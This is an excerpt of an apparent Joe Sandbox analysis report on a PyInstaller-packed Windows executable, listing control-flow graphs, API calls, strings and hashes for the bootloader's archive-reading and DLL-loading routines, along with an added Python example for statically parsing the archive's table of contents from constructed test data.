control_flow_graph 267 7ff62cc71950-7ff62cc7198b call 7ff62cc745b0 270 7ff62cc71991-7ff62cc719d1 call 7ff62cc77f80 267->270 271 7ff62cc71c4e-7ff62cc71c72 call 7ff62cc7c5c0 267->271 276 7ff62cc71c3b-7ff62cc71c3e call 7ff62cc800bc 270->276 277 7ff62cc719d7-7ff62cc719e7 call 7ff62cc80744 270->277 281 7ff62cc71c43-7ff62cc71c4b 276->281 282 7ff62cc71a08-7ff62cc71a24 call 7ff62cc8040c 277->282 283 7ff62cc719e9-7ff62cc71a03 call 7ff62cc84f78 call 7ff62cc72910 277->283 281->271 289 7ff62cc71a26-7ff62cc71a40 call 7ff62cc84f78 call 7ff62cc72910 282->289 290 7ff62cc71a45-7ff62cc71a5a call 7ff62cc84f98 282->290 283->276 289->276 296 7ff62cc71a5c-7ff62cc71a76 call 7ff62cc84f78 call 7ff62cc72910 290->296 297 7ff62cc71a7b-7ff62cc71afc call 7ff62cc71c80 * 2 call 7ff62cc80744 290->297 296->276 309 7ff62cc71b01-7ff62cc71b14 call 7ff62cc84fb4 297->309 312 7ff62cc71b16-7ff62cc71b30 call 7ff62cc84f78 call 7ff62cc72910 309->312 313 7ff62cc71b35-7ff62cc71b4e call 7ff62cc8040c 309->313 312->276 319 7ff62cc71b50-7ff62cc71b6a call 7ff62cc84f78 call 7ff62cc72910 313->319 320 7ff62cc71b6f-7ff62cc71b8b call 7ff62cc80180 313->320 319->276 326 7ff62cc71b8d-7ff62cc71b99 call 7ff62cc72710 320->326 327 7ff62cc71b9e-7ff62cc71bac 320->327 326->276 327->276 330 7ff62cc71bb2-7ff62cc71bb9 327->330 333 7ff62cc71bc1-7ff62cc71bc7 330->333 334 7ff62cc71bc9-7ff62cc71bd6 333->334 335 7ff62cc71be0-7ff62cc71bef 333->335 336 7ff62cc71bf1-7ff62cc71bfa 334->336 335->335 335->336 337 7ff62cc71bfc-7ff62cc71bff 336->337 338 7ff62cc71c0f 336->338 337->338 339 7ff62cc71c01-7ff62cc71c04 337->339 340 7ff62cc71c11-7ff62cc71c24 338->340 339->338 341 7ff62cc71c06-7ff62cc71c09 339->341 342 7ff62cc71c2d-7ff62cc71c39 340->342 343 7ff62cc71c26 340->343 341->338 344 7ff62cc71c0b-7ff62cc71c0d 341->344 342->276 342->333 343->342 344->340
APIs
  • Part of subcall function 00007FF62CC77F80: _fread_nolock.LIBCMT ref: 00007FF62CC7802A
• _fread_nolock.LIBCMT ref: 00007FF62CC71A1B
  • Part of subcall function 00007FF62CC72910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
• Instruction ID: c2a2261a0094ef8775b33c91a0820f30aa242f53cdaacb0095c9c6d03841031e
• Opcode Fuzzy Hash: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
• Instruction Fuzzy Hash: 3B81D071F0868295EF60CB28DC506BA63B4EF487A4F448135E98DCB789DE3CE1899742
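The strings attributed to the function at 7ff62cc71950 (MEI, Failed to seek to cookie position!, Failed to read cookie!, Could not read full TOC!, together with fseek/fread/calloc) identify it as the PyInstaller bootloader's archive-open routine: it seeks to the trailing cookie, validates it, allocates a buffer and reads the table of contents before any embedded Python code runs. The Python below is an added example for this report, not code from the sample, from PyInstaller or from Joe Sandbox. It re-implements that open path over a constructed onefile-style archive so an analyst can list the embedded entries statically (the 's' entries are the scripts the bootloader hands to the interpreter) instead of executing the binary. The cookie and TOC field layout is the one documented by the public PyInstaller bootloader and archive writer; the entry names, payloads, Python version and trailer in SAMPLE_ENTRIES and main are constructed test data.

```python
"""Parse a PyInstaller CArchive cookie and table of contents (TOC).

Added example; not code from the analysed sample, PyInstaller or the report.
Field layout follows the public PyInstaller bootloader/archive writer.
The sample archive built here is constructed test data.
"""
import struct
import zlib

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"        # cookie magic the bootloader scans for
COOKIE_FMT = "!8sIIii64s"                   # magic, pkg len, TOC offset, TOC len, pyvers, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes
ENTRY_FMT = "!iIIIBc"                       # entry len, data offset, csize, usize, compressed flag, type
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)     # 18 bytes, followed by a NUL-padded name

# Constructed entries: (name, payload, type code, compressed). 's' = entry-point
# script, 'b' = binary/DLL. Payloads are dummy bytes, not real sample content.
SAMPLE_ENTRIES = [
    ("pyiboot01_bootstrap", b"import sys\n", "s", True),
    ("example_main", b"print('constructed payload')\n", "s", True),
    ("VCRUNTIME140.dll", b"MZ" + b"\0" * 62, "b", False),
]


def build_sample_archive(entries, pyvers=312, pylib=b"python312.dll", trailer=b""):
    """Lay out [entry data][TOC][cookie][optional trailer] like a onefile overlay."""
    data, toc = bytearray(), bytearray()
    for name, payload, typecode, compress in entries:
        stored = zlib.compress(payload) if compress else payload
        name_b = name.encode("utf-8") + b"\0"
        entry_len = ENTRY_SIZE + len(name_b)
        entry_len += (-entry_len) % 16      # the writer pads each entry to 16 bytes
        toc += struct.pack(ENTRY_FMT, entry_len, len(data), len(stored), len(payload),
                           int(compress), typecode.encode())
        toc += name_b.ljust(entry_len - ENTRY_SIZE, b"\0")
        data += stored
    pkg_len = len(data) + len(toc) + COOKIE_SIZE   # cookie.len includes the cookie itself
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyvers, pylib)
    return bytes(data + toc + cookie + trailer)


def parse_archive(blob):
    """Mirror the bootloader: locate the cookie, validate it, then walk the TOC."""
    cookie_pos = blob.rfind(MAGIC)           # scan from the end; trailing data may follow the cookie
    if cookie_pos < 0 or len(blob) < cookie_pos + COOKIE_SIZE:
        raise ValueError("Failed to read cookie!")
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FMT, blob[cookie_pos:cookie_pos + COOKIE_SIZE])
    pkg_start = cookie_pos + COOKIE_SIZE - pkg_len   # archive start; all offsets are relative to it
    if pkg_start < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("Cookie offsets point outside the archive")
    toc = blob[pkg_start + toc_off:pkg_start + toc_off + toc_len]
    if len(toc) != toc_len:
        raise ValueError("Could not read full TOC!")
    entries, off = [], 0
    while off < toc_len:
        if off + ENTRY_SIZE > toc_len:
            raise ValueError("Truncated TOC entry")
        entry_len, dpos, csize, usize, cflag, etype = struct.unpack(ENTRY_FMT, toc[off:off + ENTRY_SIZE])
        if entry_len < ENTRY_SIZE or off + entry_len > toc_len:
            raise ValueError("Corrupt TOC entry")
        name = toc[off + ENTRY_SIZE:off + entry_len].rstrip(b"\0").decode("utf-8")
        entries.append({"name": name, "pos": pkg_start + dpos, "csize": csize,
                        "usize": usize, "compressed": bool(cflag), "type": etype.decode()})
        off += entry_len
    # Current releases store major*100+minor (312); older ones major*10+minor (39).
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    return {"pkg_start": pkg_start, "python": (major, minor),
            "pylib": pylib.rstrip(b"\0").decode(), "entries": entries}


def extract_entry(blob, entry):
    """Return one entry's bytes, inflating it when the TOC marks it compressed."""
    raw = blob[entry["pos"]:entry["pos"] + entry["csize"]]
    out = zlib.decompress(raw) if entry["compressed"] else raw
    if len(out) != entry["usize"]:
        raise ValueError(f"size mismatch for {entry['name']}")
    return out


def entry_point_scripts(info):
    """Names of 's' entries: the scripts the bootloader runs in the embedded interpreter."""
    return [e["name"] for e in info["entries"] if e["type"] == "s"]


if __name__ == "__main__":
    # Constructed: a PE-like prefix before the archive and padding after the cookie.
    blob = b"MZ" + b"\x90" * 100 + build_sample_archive(SAMPLE_ENTRIES, trailer=b"\0" * 32)
    info = parse_archive(blob)
    print(f"archive at {info['pkg_start']}, Python {info['python']}, lib {info['pylib']}")
    for e in info["entries"]:
        print(f"  {e['type']} {e['name']:24} {e['usize']:6} bytes compressed={e['compressed']}")
    print("entry points:", entry_point_scripts(info))
```

On a real sample, read the whole PE into memory and hand it to parse_archive; the backward scan for the magic tolerates the PE image in front of the overlay and any bytes appended after the cookie. The parser assumes the PyInstaller 2.1+ cookie with the 64-byte library-name field and archive-relative offsets; very old PyInstaller 2.0 archives used a shorter cookie and absolute offsets and are not handled here.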

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
• Instruction ID: d1bf3a5b8814cd65c2a3c458666f3e6fd8a579b5481355c22a6bd59ee45c8523
• Opcode Fuzzy Hash: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
• Instruction Fuzzy Hash: B141BD32B0868295EF11DB299C105BA63B4FF447E8F448532ED0D8BB99DE3CE50AD702

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 528 7ff62cc71210-7ff62cc7126d call 7ff62cc7bdf0 531 7ff62cc71297-7ff62cc712af call 7ff62cc84fb4 528->531 532 7ff62cc7126f-7ff62cc71296 call 7ff62cc72710 528->532 537 7ff62cc712d4-7ff62cc712e4 call 7ff62cc84fb4 531->537 538 7ff62cc712b1-7ff62cc712cf call 7ff62cc84f78 call 7ff62cc72910 531->538 544 7ff62cc71309-7ff62cc7131b 537->544 545 7ff62cc712e6-7ff62cc71304 call 7ff62cc84f78 call 7ff62cc72910 537->545 549 7ff62cc71439-7ff62cc7146d call 7ff62cc7bad0 call 7ff62cc84fa0 * 2 538->549 548 7ff62cc71320-7ff62cc7133d call 7ff62cc8040c 544->548 545->549 554 7ff62cc71342-7ff62cc71345 548->554 557 7ff62cc7134b-7ff62cc71355 call 7ff62cc80180 554->557 558 7ff62cc71431 554->558 557->558 564 7ff62cc7135b-7ff62cc71367 557->564 558->549 566 7ff62cc71370-7ff62cc71398 call 7ff62cc7a230 564->566 569 7ff62cc7139a-7ff62cc7139d 566->569 570 7ff62cc71416-7ff62cc7142c call 7ff62cc72710 566->570 571 7ff62cc71411 569->571 572 7ff62cc7139f-7ff62cc713a9 569->572 570->558 571->570 574 7ff62cc713ab-7ff62cc713c1 call 7ff62cc80b4c 572->574 575 7ff62cc713d4-7ff62cc713d7 572->575 585 7ff62cc713c3-7ff62cc713cd call 7ff62cc80180 574->585 586 7ff62cc713cf-7ff62cc713d2 574->586 577 7ff62cc713ea-7ff62cc713ef 575->577 578 7ff62cc713d9-7ff62cc713e7 call 7ff62cc99ea0 575->578 577->566 580 7ff62cc713f5-7ff62cc713f8 577->580 578->577 583 7ff62cc7140c-7ff62cc7140f 580->583 584 7ff62cc713fa-7ff62cc713fd 580->584 583->558 584->570 587 7ff62cc713ff-7ff62cc71407 584->587 585->577 585->586 586->570 587->548
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
• Instruction ID: 6de156a15c2040317328a8afe42b7c9599c13c37742a4f841dc13d74ec64d578
• Opcode Fuzzy Hash: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
• Instruction Fuzzy Hash: C851D832B0864285EE619B19AC503BA62B5FF85BB4F444235ED4DCBBC9DE3CE509D701

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736E1
• GetLastError.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736EB
  • Part of subcall function 00007FF62CC72C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72C9E
  • Part of subcall function 00007FF62CC72C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72D63
  • Part of subcall function 00007FF62CC72C50: MessageBoxW.USER32 ref: 00007FF62CC72D99
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: b956c5c0559a42c694c9bc162a435fcaa0ce6a7cf8795c578b551813880ac6c6
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 8821A7A1F1CA4291FE20972CEC553B62274FF883B8F844136E55DCA5D5EE2CE509D302

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 689 7ff62cc8bacc-7ff62cc8baf2 690 7ff62cc8baf4-7ff62cc8bb08 call 7ff62cc84f58 call 7ff62cc84f78 689->690 691 7ff62cc8bb0d-7ff62cc8bb11 689->691 707 7ff62cc8befe 690->707 693 7ff62cc8bee7-7ff62cc8bef3 call 7ff62cc84f58 call 7ff62cc84f78 691->693 694 7ff62cc8bb17-7ff62cc8bb1e 691->694 713 7ff62cc8bef9 _invalid_parameter_noinfo 693->713 694->693 697 7ff62cc8bb24-7ff62cc8bb52 694->697 697->693 700 7ff62cc8bb58-7ff62cc8bb5f 697->700 703 7ff62cc8bb61-7ff62cc8bb73 call 7ff62cc84f58 call 7ff62cc84f78 700->703 704 7ff62cc8bb78-7ff62cc8bb7b 700->704 703->713 705 7ff62cc8bb81-7ff62cc8bb87 704->705 706 7ff62cc8bee3-7ff62cc8bee5 704->706 705->706 712 7ff62cc8bb8d-7ff62cc8bb90 705->712 711 7ff62cc8bf01-7ff62cc8bf18 706->711 707->711 712->703 715 7ff62cc8bb92-7ff62cc8bbb7 712->715 713->707 717 7ff62cc8bbb9-7ff62cc8bbbb 715->717 718 7ff62cc8bbea-7ff62cc8bbf1 715->718 721 7ff62cc8bbe2-7ff62cc8bbe8 717->721 722 7ff62cc8bbbd-7ff62cc8bbc4 717->722 719 7ff62cc8bbf3-7ff62cc8bbff call 7ff62cc8d66c 718->719 720 7ff62cc8bbc6-7ff62cc8bbdd call 7ff62cc84f58 call 7ff62cc84f78 _invalid_parameter_noinfo 718->720 728 7ff62cc8bc04-7ff62cc8bc1b call 7ff62cc8a9b8 * 2 719->728 742 7ff62cc8bd70 720->742 725 7ff62cc8bc68-7ff62cc8bc7f 721->725 722->720 722->721 726 7ff62cc8bc81-7ff62cc8bc89 725->726 727 7ff62cc8bcfa-7ff62cc8bd04 call 7ff62cc9398c 725->727 726->727 730 7ff62cc8bc8b-7ff62cc8bc8d 726->730 740 7ff62cc8bd8e 727->740 741 7ff62cc8bd0a-7ff62cc8bd1f 727->741 750 7ff62cc8bc38-7ff62cc8bc63 call 7ff62cc8c2f4 728->750 751 7ff62cc8bc1d-7ff62cc8bc33 call 7ff62cc84f78 call 7ff62cc84f58 728->751 730->727 734 7ff62cc8bc8f-7ff62cc8bca5 730->734 734->727 738 7ff62cc8bca7-7ff62cc8bcb3 734->738 738->727 743 7ff62cc8bcb5-7ff62cc8bcb7 738->743 746 7ff62cc8bd93-7ff62cc8bdb3 ReadFile 740->746 741->740 747 7ff62cc8bd21-7ff62cc8bd33 GetConsoleMode 741->747 744 7ff62cc8bd73-7ff62cc8bd7d call 7ff62cc8a9b8 742->744 743->727 748 7ff62cc8bcb9-7ff62cc8bcd1 743->748 744->711 752 7ff62cc8bdb9-7ff62cc8bdc1 746->752 753 7ff62cc8bead-7ff62cc8beb6 GetLastError 746->753 747->740 754 7ff62cc8bd35-7ff62cc8bd3d 747->754 748->727 757 7ff62cc8bcd3-7ff62cc8bcdf 748->757 750->725 751->742 752->753 760 7ff62cc8bdc7 752->760 755 7ff62cc8bed3-7ff62cc8bed6 753->755 756 7ff62cc8beb8-7ff62cc8bece call 7ff62cc84f78 call 7ff62cc84f58 753->756 754->746 762 7ff62cc8bd3f-7ff62cc8bd61 ReadConsoleW 754->762 767 7ff62cc8bd69-7ff62cc8bd6b call 7ff62cc84eec 755->767 768 7ff62cc8bedc-7ff62cc8bede 755->768 756->742 757->727 766 7ff62cc8bce1-7ff62cc8bce3 757->766 770 7ff62cc8bdce-7ff62cc8bde3 760->770 763 7ff62cc8bd82-7ff62cc8bd8c 762->763 764 7ff62cc8bd63 GetLastError 762->764 763->770 764->767 766->727 774 7ff62cc8bce5-7ff62cc8bcf5 766->774 767->742 768->744 770->744 776 7ff62cc8bde5-7ff62cc8bdf0 770->776 774->727 779 7ff62cc8bdf2-7ff62cc8be0b call 7ff62cc8b6e4 776->779 780 7ff62cc8be17-7ff62cc8be1f 776->780 785 7ff62cc8be10-7ff62cc8be12 779->785 781 7ff62cc8be21-7ff62cc8be33 780->781 782 7ff62cc8be9b-7ff62cc8bea8 call 7ff62cc8b524 780->782 786 7ff62cc8be8e-7ff62cc8be96 781->786 787 7ff62cc8be35 781->787 782->785 785->744 786->744 790 7ff62cc8be3a-7ff62cc8be41 787->790 791 7ff62cc8be43-7ff62cc8be47 790->791 792 7ff62cc8be7d-7ff62cc8be88 790->792 793 7ff62cc8be63 791->793 794 7ff62cc8be49-7ff62cc8be50 791->794 792->786 796 7ff62cc8be69-7ff62cc8be79 793->796 794->793 795 7ff62cc8be52-7ff62cc8be56 794->795 795->793 797 7ff62cc8be58-7ff62cc8be61 795->797 796->790 798 7ff62cc8be7b 796->798 797->796 798->786
APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
• Instruction ID: 7c077e2aff5f63cf7d231dc390abb066b8caf8f986de67185a38806eb2660584
• Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
• Instruction Fuzzy Hash: CAC1C432B0C68695EF628B199C60ABF6770EB81BE0F554235EA4D83795CF7CE8458312

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction ID: f7066f966b33c59090be11c9848da9ef106e25ef8a964541b0c85e258afc640f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42419331B18A87D1EE11EB28EC141F96379FB443A4F804132EA5C8B695EF3CE519D742

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: 271a94c00b644a4ab053a53586846c446c36e41e32e8fdcb754450a43629838b
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: B941A222F2878283FB11CB64995077A6271FB957B4F109335EA5C83AD6DFBCA5E08701

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: 8b79717dbfe36037813a08f35e9a0aef6439a820653bdf8024acb8f381f60797
• Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction Fuzzy Hash: 95315920F08A5346FE24AB2CDD253B916B9EF517A4F444434E54ECF2D7DE2CA409E253

Control-flow Graph
• Entry block: 7ff62cc801ac-7ff62cc801d9; last block: 7ff62cc80405-7ff62cc8040a
• Callees in the graph: 7ff62cc84f78, 7ff62cc9a540, 7ff62cc8bf1c, 7ff62cc8a4ec, 7ff62cc8bacc, 7ff62cc99ea0, _invalid_parameter_noinfo
• (Rendered graph with executed / not-executed colouring and full block-edge list omitted)

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction ID: bea6f2979c97292ab5e279b5dbc5d2ad7b6025bd81adf42ae9bfc8ac724a672c
• Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction Fuzzy Hash: 2B51B461B0964286FF6A9A6D9C00E7B62A1AF44BF4F148734DE6DC77C5CF3CE4018642

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
